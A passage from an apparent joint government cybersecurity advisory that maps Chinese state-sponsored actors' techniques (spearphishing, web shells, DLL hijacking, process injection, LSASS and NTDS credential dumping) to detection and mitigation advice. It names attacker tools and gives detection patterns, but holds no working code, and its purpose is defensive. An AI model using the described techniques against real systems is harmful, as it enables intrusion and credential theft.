they can be unintentionally leaked.\n| \n\nHarden:\n\n * Application Hardening [[D3-AH](<https://d3fend.mitre.org/technique/d3f:ApplicationHardening>)]\n * Platform Hardening \n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * File Analysis [[D3-FA](<https://d3fend.mitre.org/technique/d3f:FileAnalysis>)] \n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Process Analysis \n * Process Spawn Analysis\n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate: \n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nPhishing [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566>)]: \n\n * Spearphishing Attachment [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)] \n\n * Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures. \nThese compromise attempts use the cyber actors\u2019 dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment. \n\n| \n\n * Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and re-enforce the appropriate user responses to spearphishing emails. Quarantine suspicious files with antivirus solutions.\n * Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments.\n * Block uncommon file types in emails that are not needed by general users (`.exe`, `.jar`,`.vbs`)\n * Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using Domain Keys Identified Mail [DKIM]). Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.\n * Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Prevent users from clicking on malicious links by stripping hyperlinks or implementing \"URL defanging\" at the Email Security Gateway or other email security tools.\n * Add external sender banners to emails to alert users that the email came from an external sender.\n| \n\nHarden: \n\n * Message Hardening \n * Message Authentication [[D3-MAN](<https://d3fend.mitre.org/technique/d3f:MessageAuthentication>)]\n * Transfer Agent Authentication [[D3-TAAN](<https://d3fend.mitre.org/technique/d3f:TransferAgentAuthentication>)]\n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Message Analysis \n * Sender MTA Reputation Analysis [[D3-SMRA](<https://d3fend.mitre.org/technique/d3f:SenderMTAReputationAnalysis>)]\n * Sender Reputation Analysis [[D3-SRA](<https://d3fend.mitre.org/technique/d3f:SenderReputationAnalysis>)] \n \n \nExternal Remote Services [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities. The cyber actors used or modified public proof of concept code in order to exploit vulnerable systems.\n\n * Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs).\n\n * Exploiting Internet accessible webservers using webshell small code injections against multiple code languages, including `net`, `asp`, `apsx`, `php`, `japx`, and `cfm`. \n\n**Note:** refer to the references listed above in Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)] for information on CVEs known to be exploited by malicious Chinese cyber actors.\n\n**Note: **this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)].\n\n| \n\n * Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services.\n * Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network.\n * Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users).\n * Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions.\n * Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection.\n * Review and verify all connections between customer systems, service provider systems, and other client enclaves.\n| \n\nHarden:\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * Network Traffic Analysis \n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n * Platform Monitoring [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring>)]\n * Process Analysis \n * Process Spawn Analysis [[D3-SPA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)] \n \nValid Accounts [[T1078](<https://attack.mitre.org/versions/v9/techniques/T1078>)]:\n\n * Default Accounts [[T1078.001](<https://attack.mitre.org/versions/v9/techniques/T1078/001>)]\n\n * Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v9/techniques/T1078/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed: gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)], Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)], and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Adhere to best practices for password and permission management.\n * Ensure that MSP accounts are not assigned to administrator groups and restrict those accounts to only systems they manage \n * Do not store credentials or sensitive data in plaintext.\n * Change all default usernames and passwords.\n * Routinely update and secure applications using Secure Shell (SSH). \n * Update SSH keys regularly and keep private keys secure.\n * Routinely audit privileged accounts to identify malicious use.\n| \n\nHarden: \n\n * Credential Hardening \n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\nDetect:\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)] \n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Execution_ [[TA0002](<https://attack.mitre.org/versions/v9/tactics/TA0002>)]\n\n_Table IV: Chinese state-sponsored cyber actors\u2019 Execution TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nCommand and Scripting Interpreter [[T1059](<https://attack.mitre.org/versions/v9/techniques/T1059>)]: \n\n * PowerShell\u00ae [[T1059.001](<https://attack.mitre.org/versions/v9/techniques/T1059/001>)]\n\n * Windows\u00ae Command Shell [[T1059.003](<https://attack.mitre.org/versions/v9/techniques/T1059/003>)]\n\n * Unix\u00ae Shell [[T1059.004](<https://attack.mitre.org/versions/v9/techniques/T1059/004>)]\n\n * Python [[T1059.006](<https://attack.mitre.org/versions/v9/techniques/T1059/006>)]\n\n * JavaScript [[T1059.007](<https://attack.mitre.org/versions/v9/techniques/T1059/007>)]\n\n * Network Device CLI [[T1059.008](<https://attack.mitre.org/versions/v9/techniques/T1059/008>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI).\n\n * Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network. \n\n * Employing Python scripts to exploit vulnerable servers.\n\n * Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux\u00ae servers in the victim network.\n\n| \n\nPowerShell\n\n * Turn on PowerShell logging. (**Note:** this works better in newer versions of PowerShell. NSA, CISA, and FBI recommend using version 5 or higher.)\n\n * Push Powershell logs into a security information and event management (SIEM) tool.\n\n * Monitor for suspicious behavior and commands. Regularly evaluate and update blocklists and allowlists.\n\n * Use an antivirus program, which may stop malicious code execution that cyber actors attempt to execute via PowerShell.\n\n * Remove PowerShell if it is not necessary for operations. \n\n * Restrict which commands can be used.\n\nWindows Command Shell\n\n * Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts. \n\n * Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system, but enabled. \n\n * Monitor for and investigate other unusual or suspicious scripting behavior. \n\nUnix\n\n * Use application controls to prevent execution.\n\n * Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious. \n\n * If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious. \n\nPython\n\n * Audit inventory systems for unauthorized Python installations.\n\n * Blocklist Python where not required.\n\n * Prevent users from installing Python where not required.\n\nJavaScript\n\n * Turn off or restrict access to unneeded scripting components.\n\n * Blocklist scripting where appropriate.\n\n * For malicious code served up through ads, adblockers can help prevent that code from executing.\n\nNetwork Device Command Line Interface (CLI)\n\n * Use TACACS+ to keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization.\n\n * Use an authentication, authorization, and accounting (AAA) systems to limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse.\n\n * Ensure least privilege principles are applied to user accounts and groups.\n\n| \n\nHarden: \n\n * Platform Hardening [[D3-PH](<https://d3fend.mitre.org/technique/d3f:PlatformHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * Script Execution Analysis [[D3-SEA](<https://d3fend.mitre.org/technique/d3f:ScriptExecutionAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nScheduled Task/Job [[T1053](<https://attack.mitre.org/versions/v9/techniques/T1053>)]\n\n * Cron [[T1053.003](<https://attack.mitre.org/versions/v9/techniques/T1053/003>)]\n * Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v9/techniques/T1053/005>)]\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as `schtask` or `crontab` to create and schedule tasks that enumerate victim devices and networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)] and Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n\u2022 Monitor scheduled task creation from common utilities using command-line invocation and compare for any changes that do not correlate with known software, patch cycles, or other administrative activity. \n\u2022 Configure event logging for scheduled task creation and monitor process execution from `svchost.exe` (Windows 10) and Windows Task Scheduler (Older version of Windows) to look for changes in `%systemroot%\\System32\\Tasks` that do not correlate with known software, patch cycles, or other administrative activity. Additionally monitor for any scheduled tasks created via command line utilities\u2014such as PowerShell or Windows Management Instrumentation (WMI)\u2014that do not conform to typical administrator or user actions. \n\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring [[D3-OSM](<https://d3fend.mitre.org/technique/d3f:OperatingSystemMonitoring>)] \n * Scheduled Job Analysis [[D3-SJA](<https://d3fend.mitre.org/technique/d3f:ScheduledJobAnalysis>)]\n * System Daemon Monitoring [[D3-SDM](<https://d3fend.mitre.org/technique/d3f:SystemDaemonMonitoring>)]\n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nUser Execution [[T1204](<https://attack.mitre.org/versions/v9/techniques/T1204>)]\n\n * Malicious Link [[T1204.001](<https://attack.mitre.org/versions/v9/techniques/T1204/001>)]\n * Malicious File [[T1204.002](<https://attack.mitre.org/versions/v9/techniques/T1204/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment.\n\n| \n\n * Use an antivirus program, which may stop malicious code execution that cyber actors convince users to attempt to execute.\n * Prevent unauthorized execution by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.\n * Use a domain reputation service to detect and block suspicious or malicious domains.\n * Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation.\n| \n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * File Content Rules [[D3-FCR](<https://d3fend.mitre.org/technique/d3f:FileContentRules>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Network Traffic Analysis \n * DNS Traffic Analysis [[D3-DNSTA](<https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Tactics: _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)]\n\n_Table V: Chinese state-sponsored cyber actors\u2019 Persistence TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nHijack Execution Flow [[T1574](<https://attack.mitre.org/versions/v9/techniques/T1574>)]: \n\n * DLL Search Order Hijacking [[T1574.001](<https://attack.mitre.org/versions/v9/techniques/T1574/001>)]\n| \n\nChinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process. \n\n**Note:** this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)] and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Disallow loading of remote DLLs.\n * Enable safe DLL search mode.\n * Implement tools for detecting search order hijacking opportunities.\n * Use application allowlisting to block unknown DLLs.\n * Monitor the file system for created, moved, and renamed DLLs.\n * Monitor for changes in system DLLs not associated with updates or patches.\n * Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path).\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * Service Binary Verification [[D3-SBV](<https://d3fend.mitre.org/technique/d3f:ServiceBinaryVerification>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nModify Authentication Process [[T1556](<https://attack.mitre.org/versions/v9/techniques/T1556>)]\n\n * Domain Controller Authentication [[T1556.001](<https://attack.mitre.org/versions/v9/techniques/T1556/001>)]\n| \n\nChinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network. \nNote: this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)] and Credential Access [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)].\n\n| \n\n * Monitor for policy changes to authentication mechanisms used by the domain controller. \n * Monitor for modifications to functions exported from authentication DLLs (such as `cryptdll.dll` and `samsrv.dll`).\n * Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. \n * Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, accounts logged in at odd times or outside of business hours). \n * Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n * Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for and correlate changes to Registry entries.\n| \n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)]\n * User Behavior Analysis \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]\n * User Geolocation Logon Pattern Analysis [[D3-UGLPA](<https://d3fend.mitre.org/technique/d3f:UserGeolocationLogonPatternAnalysis>)] \n \nServer Software Component [[T1505](<https://attack.mitre.org/versions/v9/techniques/T1505>)]: \n\n * Web Shell [[T1505.003](<https://attack.mitre.org/versions/v9/techniques/T1505/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks. \n\n| \n\n * Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures.\n * Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts.\n * Perform integrity checks on critical servers to identify and investigate unexpected changes.\n * Have application developers sign their code using digital signatures to verify their identity.\n * Identify and remediate web application vulnerabilities or configuration weaknesses. Employ regular updates to applications and host operating systems.\n * Implement a least-privilege policy on web servers to reduce adversaries\u2019 ability to escalate privileges or pivot laterally to other hosts and control creation and execution of files in particular directories.\n * If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction and logging traffic between the two provides a method to identify possible malicious activity.\n * Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked. Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials.\n * Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones.\n * Establish, and backup offline, a \u201cknown good\u201d version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system.\n * Employ user input validation to restrict exploitation of vulnerabilities.\n * Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern.\n * Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis.\n| \n\nDetect: \n\n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Per Host Download-Upload Ratio Analysis [[D3-PHDURA](<https://d3fend.mitre.org/technique/d3f:PerHostDownload-UploadRatioAnalysis>)]\n * Process Analysis \n * Process Spawn Analysis \n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate:\n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nCreate or Modify System Process [[T1543](<https://attack.mitre.org/versions/v9/techniques/T1543>)]:\n\n * Windows Service [[T1543.003](<https://attack.mitre.org/versions/v9/techniques/T1543/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence.\n\n**Note: **this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n * Only allow authorized administrators to make service changes and modify service configurations. \n * Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment.\n * Monitor WMI and PowerShell for service modifications.\n| Detect: \n\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Privilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)]\n\n_Table VI: Chinese state-sponsored cyber actors\u2019 Privilege Escalation TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDomain Policy Modification [[T1484](<https://attack.mitre.org/versions/v9/techniques/T1484>)]\n\n * Group Policy Modification [[T1484.001](<https://attack.mitre.org/versions/v9/techniques/T1484/001>)]\n\n| \n\nChinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation.\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Identify and correct Group Policy Object (GPO) permissions abuse opportunities (e.g., GPO modification privileges) using auditing tools.\n * Monitor directory service changes using Windows event logs to detect GPO modifications. Several events may be logged for such GPO modifications.\n * Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.\n| \n\nDetect:\n\n * Network Traffic Analysis \n * Administrative Network Activity Analysis [[D3-ANAA](<https://d3fend.mitre.org/technique/d3f:AdministrativeNetworkActivityAnalysis>)]\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)] \n \nProcess Injection [[T1055](<https://attack.mitre.org/versions/v9/techniques/T1055>)]: \n\n * Dynamic Link Library Injection [[T1055.001](<https://attack.mitre.org/versions/v9/techniques/T1055/001>)]\n * Portable Executable Injection [[T1055.002](<https://attack.mitre.org/versions/v9/techniques/T1055/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Injecting into the `rundll32.exe` process to hide usage of Mimikatz, as well as injecting into a running legitimate `explorer.exe` process for lateral movement.\n * Using shellcode that injects implants into newly created instances of the Service Host process (`svchost`)\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]. \n\n\n| \n\n * Use endpoint protection software to block process injection based on behavior of the injection process.\n * Monitor DLL/Portable Executable (PE) file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.\n * Monitor for suspicious sequences of Windows API calls such as `CreateRemoteThread`, `VirtualAllocEx`, or `WriteProcessMemory` and analyze processes for unexpected or atypical behavior such as opening network connections or reading files.\n * To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only users who actually need it; upgrade Windows to at least version 8.1 or 10; run Local Security Authority Subsystem Service (LSASS) in protected mode on Windows 8.1 and higher; harden the local security authority (LSA) to prevent code injection.\n| \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Defense Evasion _[[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]\n\n_Table VII: Chinese state-sponsored cyber actors\u2019 Defensive Evasion TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDeobfuscate/Decode Files or Information [[T1140](<https://attack.mitre.org/versions/v9/techniques/T1140>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.\n\n| \n\n * Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.\n * Consider blocking, disabling, or monitoring use of 7-Zip.\n| \n\nDetect: \n\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nHide Artifacts [[T1564](<https://attack.mitre.org/versions/v9/techniques/T1564>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using benign executables which used DLL load-order hijacking to activate the malware installation process.\n\n| \n\n * Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware.\n * Monitor event and authentication logs for records of hidden artifacts being used.\n * Monitor the file system and shell commands for hidden attribute usage.\n| \n\nDetect: \n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nIndicator Removal from Host [[T1070](<https://attack.mitre.org/versions/v9/techniques/T1070>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed deleting files using `rm` or `del` commands. \nSeveral files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created/used.\n\n| \n\n * Make the environment variables associated with command history read only to ensure that the history is preserved.\n * Recognize timestomping by monitoring the contents of important directories and the attributes of the files. \n * Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their `~/.bash_history` or `ConsoleHost_history.txt` files.\n * Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce.\n * Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise and inconsistencies between file timestamps and previous handles opened to them can be a detection rule.\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nObfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v9/techniques/T1027>)]\n\n| \n\nChinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.\n\n| \n\nConsider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted.\n\n| \n\nDetect:\n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nSigned Binary Proxy Execution [[T1218](<https://attack.mitre.org/versions/v9/techniques/T1218>)]\n\n * `Mshta` [[T1218.005](<https://attack.mitre.org/versions/v9/techniques/T1218/005>)]\n\n * `Rundll32` [[T1218.011](<https://attack.mitre.org/versions/v9/techniques/T1218/011>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using Microsoft signed binaries, such as `Rundll32`, as a proxy to execute malicious payloads.\n\n| \n\nMonitor processes for the execution of known proxy binaries (e.g., r`undll32.exe`) and look for anomalous activity that does not follow historically good arguments and loaded DLLs associated with the invocation of the binary.\n\n| \n\nDetect:\n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)]\n\n_Table VIII: Chinese state-sponsored cyber actors\u2019 Credential Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v9/techniques/T1212>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.\n\n| \n\n * Update and patch software regularly.\n\n * Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately.\n\n| \n\nHarden: \n\n * Platform Hardening\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)] \n \nOS Credential Dumping [[T1003](<https://attack.mitre.org/versions/v9/techniques/T1003>)] \n\u2022 LSASS Memory [[T1003.001](<https://attack.mitre.org/versions/v9/techniques/T1003/001>)] \n\u2022 NTDS [[T1003.003](<https://attack.mitre.org/versions/v9/techniques/T1003/003>)]\n\n| \n\nChinese state-sponsored cyber actors were observed targeting the LSASS process or Active directory (`NDST.DIT)` for credential dumping.\n\n| \n\n * Monitor process and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the `NDST.DIT`.\n\n * Ensure that local administrator accounts have complex, unique passwords across all systems on the network.\n\n * Limit credential overlap across accounts and systems by training users and administrators not to use the same 